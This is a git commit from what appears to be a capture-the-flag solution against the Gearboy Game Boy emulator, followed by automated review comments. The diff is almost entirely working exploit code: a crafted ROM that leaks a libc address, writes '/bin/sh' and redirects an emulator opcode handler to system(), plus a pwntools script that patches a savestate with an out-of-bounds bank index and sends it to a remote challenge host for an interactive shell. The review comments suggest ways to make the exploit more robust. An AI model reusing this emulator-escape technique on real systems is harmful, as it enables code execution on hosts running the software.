commit a1f7b8843f887d2d698477d6d8544e545a517725
parent 3464878abafda13241f2eaed3db8bfd696ee4b67
Author: Louis Burda <quent.burda@gmail.com>
Date: Thu, 26 May 2022 19:06:59 +0200
Working locally, using unstable (container-layout-dependent) offsets
Diffstat:
M | main.c | | | 26 | +++++++++++++++----------- |
M | solve.py | | | 40 | +++++++++------------------------------- |
2 files changed, 24 insertions(+), 42 deletions(-)
diff --git a/main.c b/main.c
@@ -5,29 +5,33 @@ void
main(void)
{
volatile static uint8_t *processor;
+ volatile static uint8_t *memory;
volatile static uint64_t op0x00;
volatile static uint64_t base;
- volatile static uint64_t load_rom;
+ volatile static uint64_t libc;
+ volatile static uint64_t leak;
+ volatile static uint64_t target;
+
+ /* NEEDS TO BE FIRST SESSION OF CONTAINER! */
/* processor - wrambanks = -0x126a0 */
/* WRAM BANK = -0x13 */
processor = (void*) 0xD960;
+ memory = processor - 0xd0;
- /* leak opcode 0x00 to get base */
- op0x00 = *(uint64_t*)processor;
- base = op0x00 - 0x1d420;
- load_rom = base + 0x34ad0;
-
- /* set opcode 0x10 to load_rom */
- *(uint64_t*)(processor+0x10*0x10) = load_rom;
+ /* leak libc from addr */
+ leak = *(uint64_t*)(memory + 0x30);
+ libc = leak + 0x125cff0;
+ target = libc + 0x52290; /* system */
- /* write /bin/sh to processor pointer (opcode 0x00) */
- strcpy(processor, "/home/ctf/wrapper.py");
+ /* set opcode 0x00 (nop) to gadget */
+ strcpy(processor, "/bin/sh");
+ *(uint64_t*)(processor+0x10*0x10) = target;
+ // *(uint64_t*)(processor+0x10*0x10) = 0;
__asm \
stop \
- halt \
__endasm;
while (1);
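Review bot: The comment `/* set opcode 0x00 (nop) to gadget */` mislabels what follows: the `strcpy` fills the opcode 0x00 slot with the `"/bin/sh"` string, and it is the next line that overwrites the opcode 0x10 slot with `target` (libc + 0x52290, annotated as system), so the string is presumably the argument and 0x10 is the hijacked handler. Suggest `/* opcode 0x00 slot holds "/bin/sh"; opcode 0x10 handler is redirected to system */` and dropping the commented-out `*(uint64_t*)(processor+0x10*0x10) = 0;` line. `op0x00` and `base` are declared but no longer assigned on the new side and can go the way of `load_rom`. The libc offsets `0x125cff0` and `0x52290` rest on a single read at `memory + 0x30` with no sanity check that the leaked value looks like a pointer, and the `NEEDS TO BE FIRST SESSION OF CONTAINER!` note says the layout is fragile, so a comment recording which libc build and heap state they were measured against would save the next debugging round. main() continues past the end of the hunk.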
diff --git a/solve.py b/solve.py
@@ -6,37 +6,15 @@ from pwn import *
context.log_level = "error"
-def send(rom, state):
- #io = process("ncat --ssl 8c83260abb62e95abcc3fdf7-gearboy.challenge.master.cscg.live 31337".split())
- io = process("ncat localhost 1024".split())
- io.sendline(b64encode(open(rom, "rb").read()))
- io.sendline(b64encode(open(state, "rb").read()))
- data = io.readuntil(b"Got EOF")
- io.close()
- return data
+rom = list(open("main.gb", "rb").read())
+state = list(open("main.state", "rb").read())
-def set_wrambanks(filename, index):
- data = open(filename, "rb").read()
- data = data[:0x1000] + struct.pack("<i", index) + data[0x1004:]
- with open(filename, "wb+") as f:
- f.write(data)
+for i,v in enumerate(struct.pack("<i", -0x13)):
+ state[0x10000+i] = v
-def find_heap_start():
- search_space = (-256, -90)
- while search_space[0] + 1 != search_space[1]:
- testval = (search_space[1] + search_space[0]) // 2
- print(search_space)
+io = process("ncat --ssl 61a837693e76115bbb874401-gearboy.challenge.master.cscg.live 31337".split())
+#io = process("ncat localhost 1024".split())
+io.sendline(b64encode(bytes(rom)))
+io.sendline(b64encode(bytes(state)))
- set_modstate(testval)
-
- data = send("main.gb", "main.state")
- if b"exit code 139" in data:
- search_space = (testval, search_space[1])
- else:
- search_space = (search_space[0], testval)
-
- print("OFFSET", testval)
-
-set_wrambanks("main.gb", -0x37)
-
-print(send("main.gb", "main.state").decode())
+io.interactive()
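Review bot: The bank index `-0x13` packed into the state and the patch offset `0x10000` are bare magic numbers that must agree with the `/* WRAM BANK = -0x13 */` comment in main.c; name them, e.g. `WRAM_BANK = -0x13  # negative bank index, must match the offset math in main.c` and `STATE_WRAM_BANK_OFF = 0x10000`, so the two files are less likely to drift apart silently. `state[0x10000+i] = v` raises a bare IndexError if `main.state` is shorter than expected; a guard such as `if len(state) < STATE_WRAM_BANK_OFF + 4: sys.exit("main.state too small")` before the loop makes the failure explicit (pwn's star import appears to provide `sys`, but verify). Spawning `ncat --ssl` through `process(...)` with `context.log_level = "error"` hides TLS and connection failures behind an opaque EOF; pwntools' `remote(HOST, 31337, ssl=True)` handles the connection natively and reports errors. The hostname is hard-coded and looks per-session (the commented-out line shows a different one), so taking it from `sys.argv` would avoid editing the script every run.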